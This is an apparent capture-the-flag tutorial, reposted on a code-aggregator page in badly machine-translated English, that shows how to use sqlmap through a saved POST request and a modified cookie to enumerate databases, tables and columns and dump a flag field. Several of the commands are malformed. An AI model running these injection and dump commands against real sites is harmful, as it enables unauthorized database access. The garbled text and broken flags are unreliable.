sqlmap of post injection

Others 2019-08-25 08:33:53 views: null

table of Contents

  1. sqlmap the injection POST
  2. cookie injection violence database

 POST injection

1. Verify the presence injection

Normal data packets " the cookie: the User the User =" modify " the cookie: the User ADMIN =" post will appear flag parameters

Verify Cookie: user = admin 'and' 1 '= 1' error, no echo In Flag, illustrate this situation exists injection

2. Copy the post Save as file 1.txt

>> Here is the injection of the modified cookie, then the cookie injection of view to combine the principles of post injection, in fact, two of which are to be injected into the joint, independently of each other.

 

cookie injection

 The so-called POST injection is sending a POST request to packet injection, cookie injection is to modify the cookie information to disguise the identity or that infiltrate as an injection point

1. storms database

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  --dbs

>> you can see there are four databases

POST file 1.txt here to write a file location such as: /root/1.txt

cookie to be written: - cookie = "user = admin"

 --string parameters, the result is used to specify the character true when the page contains, does not contain this character will be judged as false: - string = "flag" represents the correct word when the echo flag

Specify the database type: - dbms = mysql

Storm Database: - dbs

Table 2. Guess

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee --tables

 

There are three tables >> guess employee database under

:-D guess the name of the database table for a specific database

Guess Table: - tables

Other parameters unchanged

3. Guess table fllaagg columns

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee -T fllaagg --columns

Guess columns to specify the database, table :-D database -T Datasheet  

Guess Column: - columns

4. guess the fields in the table

>sqlmap  -r  1.txt  -p - -cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee -T fllaagg "flag" --dump

 

>> find field contains a flag

Guess field to specify the database, table, database content :-D -T Data Sheet "Content"

Guess fields: - dump

 The same method can view the contents of the other databases, tables, the injection point is the same method, where the injection point of the data packet modified cookie data. If the present data packet itself POST directly injected post injection, the injection can not add cookie --cookie "user = admin" like this parameter.

Guess you like

Origin www.cnblogs.com/loopkep/p/11406765.html
Recommended
Face Wall Intelligence releases the Eurux-8x22B open source large model - it can be called the "science champion"
Kaiyuan Daily | Google supports Hongmeng to take over; open source Rabbit R1; Android phones supported by Docker; Microsoft’s anxiety and ambition; Haier Electric shuts down the open platform
Ranking
Jianzhi offer interview questions 68-II. The nearest common ancestor of a binary tree (recursive)
jQuery Mobile development 1-UI components
Summary of Kotlin function knowledge
[ZZ] The Naked Truth About Anisotropic Filtering
Diagnosis: record a recovery of abnormal CRASH storage caused the database to be unable to be opened normally
Redis introduction and Linux installation Redis
Experiment 2 Introduction to switches
glances open source command-line system monitoring tools introduced
Use of selector
vue3 handwriting a carousel picture
Daily
More
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)

Code World

© 2018 codetd.com